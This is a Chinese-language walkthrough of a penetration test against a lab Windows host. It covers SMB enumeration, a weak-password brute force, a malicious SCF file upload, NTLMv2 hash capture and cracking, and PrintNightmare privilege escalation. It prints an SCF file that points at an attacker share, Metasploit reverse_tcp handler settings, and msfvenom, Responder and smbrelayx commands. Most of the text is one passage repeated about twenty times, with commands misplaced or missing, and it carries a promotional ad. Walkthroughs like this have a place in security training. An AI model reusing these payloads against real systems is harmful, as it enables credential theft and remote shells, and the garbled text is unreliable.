hashcat破解ntlm 【网络安全】渗透实战学习

[Shell]Command=2
IconFile=\10.10.16.4sharehack.ico
[Taskbar]
Command=ToggleDesktop

引言：本次渗透攻击以SMB共享中的SCF文件为突破口，涉及到多个知识点，包括使用burp进行Basic Authorization认证的编码爆破、多种smb连接方法、破解windows用户的NTLM值、利用evil-winrm、收集windows主机信息的工具、msf运行powershell脚本、远程运行powershell脚本以及PrintNightmare漏洞提权等。尽管从技术层面来说，本次渗透攻击并不算太难，但文章的亮点在于综合运用了多个知识点，并对利用SMB攻击的多种方法进行了总结。现在，让我们开始这次渗透实战之旅。

信息收集：首先进行基本的端口扫描。发现445端口，想到了可以利用smb的多种方法。另外，看到5985端口，想到可能需要使用evil-winrm。因此，我们重点关注445端口。使用以下命令进行扫描：nmap -A –script smb-vuln* -p 445 10.10.11.106。然而，并没有找到直接的突破口，所以我们决定从web入手。

SMB匿名登录：尝试进行SMB匿名登录，看是否存在共享文件，这可能会给我们提供突破的线索。常用的命令如下：smbmap -H 10.10.11.106、smbclient -N -L //10.10.11.106、enum4linux -a 10.10.11.106。暂时没有发现有用的信息。

为了感谢广大读者的支持，我们准备了以下福利：如果你对网络安全入门感兴趣，可以点击这里获取网络安全重磅福利：入门&进阶全套282G学习资源包，内容包括200多本网络安全系列电子书、全套工具包、100份src源码技术文档、网络安全基础入门、Linux、web安全、攻防方面的视频以及网络安全学习路线和ctf夺旗赛解析。希望这些资源能对你的学习有所帮助。

Burp编码爆破：打开网页时，弹出Basic Authorization认证。我们使用抓包工具进行爆破。需要设置三个字段：1、admin 2、： 3、密码。使用一个弱口令字典，成功得到结果：admin:admin。

SMB共享中的SCF文件攻击：登录后台，发现一个可上传文件的地方。经过多次尝试，我们发现可以利用SCF文件进行渗透攻击。下面介绍三种利用方法：

1. 通过NTLM捕获进行SMB攻击：基本原理是，SCF（Shell命令文件）文件可用于执行一组有限的操作，一个SCF文件可以用来访问特定的UNC路径，允许渗透测试人员构建攻击。我们可以将以下代码放置在一个文本文件中，并将其植入到网络共享中。

exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.16.4
set smbhost 192.168.0.100
set srvport 8080
exploit

将hack.txt文件保存为SCF文件，并在文件名前面添加@符号，可以将hack.scf放在共享驱动器文件列表的顶部（@hack.scf），并设置接收方法。使用Responder并带上以下参数来捕获浏览共享的用户的哈希值：responder -wrf -I tun0。当用户浏览共享时，系统会自动建立网络连接，并连接到SCF文件中包含的UNC路径。Windows将尝试使用用户名和密码对该共享进行身份验证。在验证过程中，随机的8字节质询密钥会从服务器发送到客户端，然后使用该密钥对NTLM/LANMAN密码进行加密。Responder将捕获NTLMv2哈希。除了Responder，MSF也有一个模块可以用来捕获来自SMB客户端的挑战-响应密码哈希。

2. 直接获取shell：利用MSF框架实现攻击。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > hack.exe

上传之前的hack.scf来触发攻击，就可以获取用户的NTLM值。

3. 上传payload获取shell：这种方法的优点是不需要与用户进行任何交互，并且自动强制用户连接到共享，期间没有NTLMv2哈希的协商过程。因此，可以将此技术与SMB中继相结合，SMB中继将提供有效载荷，可以从访问该共享的每个用户检索Meterpreter Shell。使用MSFVenom生成将在目标上执行的有效载荷。

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit

使用Impacket中的smbrelayx脚本可以设置中继攻击，并在目标主机尝试连接SMB服务器时提供有效载荷。这将自动执行，因为SCF文件将强制每个用户使用他们自己的凭据连接到一个不存在的共享。使用以下命令进行设置：./smbrelayx.py -h Target-IP -e ./hack.exe。同时，使用MSF设置木马的回连端：exploit/multi/handler。需要配置与生成的有效载荷相同的参数。

当用户浏览共享时，SMB服务器将接收到连接，并使用用户名和密码散列与其系统进行认证，并将有效载荷执行为可写共享。然而，在本次渗透中，该方法实测失败。

获取到NTLM值后，下一步是尝试破解。

LM、NTLM和NET-NTLM2破解：Windows系统的密码哈希默认由两部分组成：LM Hash和NT Hash。LM Hash在Windows Vista/Server 2008中已默认关闭，在较旧的版本中可能会遇到。根据Windows的向下兼容性，可以通过组策略启用它。示例：299BD128C1101FD6。可以使用hashcat或john等工具进行破解。

NTLM是现在Windows系统上存储密码的方式，可以通过转储SAM数据库或使用Mimikatz来获取。示例：B4B9B02E6F09A9BD760F388B67351E2B。同样，可以使用hashcat或john等工具进行破解。

NTLMv1：NTLM协议在服务器和客户端之间的质询/响应中使用NTHash。协议的v1同时使用NT和LM哈希，具体取决于配置和可用内容。示例：hash破解。

NTLMv2：这是NTLM协议的新版本和改进版本，更难破解。与NTLMv1的概念相同，只是发送到服务器的算法和响应不同。从Windows 2000开始，成为Windows的默认设置。示例：hash破解。在本次渗透中使用的是NTLMv2。

根据破解得到的用户名和密码（tony:liltony），我们尝试连接开放的445和5985端口。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

根据开放的445和5985端口，我们尝试连接。尝试使用psexec连接失败。使用evil-winrm成功连接，接下来需要考虑提权。

SMB带用户名密码登录：利用得到的用户名和密码，再次尝试登录SMB共享。

提权：主机信息收集。尝试使用命令，但没有权限执行。因此，我们使用脚本来运行，常用的是winPEASx64.exe或winPEAS.bat。需要注意的是，运行程序时需要添加反斜杠。结果很多，最后发现了print spooler service服务。利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞（CVE-2021-1675）进行提权。测试发现直接导入powershell脚本会报错。下面介绍两种方法：

1. 使用msf加载powershell：生成一个木马。

接收反弹。利用evil-winrm上传hack.exe并运行。程序会报错并中断会话，需要迁移进程后再次尝试。

2. 远程运行powershell脚本：远程下载文件到本地并执行。

使用Invoke-WebRequest命令下载脚本。

执行脚本。

通过以上步骤，我们成功执行了脚本，并添加了一个具有administrator权限的新用户。还可以尝试远程运行ps脚本。

远程运行powershell脚本：

使用Invoke-Command命令远程运行脚本。

在本次渗透中，我们使用的是NTLMV2。使用hashcat或john等工具进行破解，成功得到用户名和密码：tony:liltony。

